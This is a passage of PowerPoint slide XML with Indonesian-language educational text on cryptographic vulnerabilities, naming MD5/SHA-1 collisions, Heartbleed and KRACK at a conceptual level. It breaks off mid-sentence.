            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persetujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakstabilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Signifikansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>punggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital modern. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, MD5 dan SHA-1, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dulunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabrakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Heartbleed, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenSSL, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KRACK (Key Reinstallation Attacks) pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA2 yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
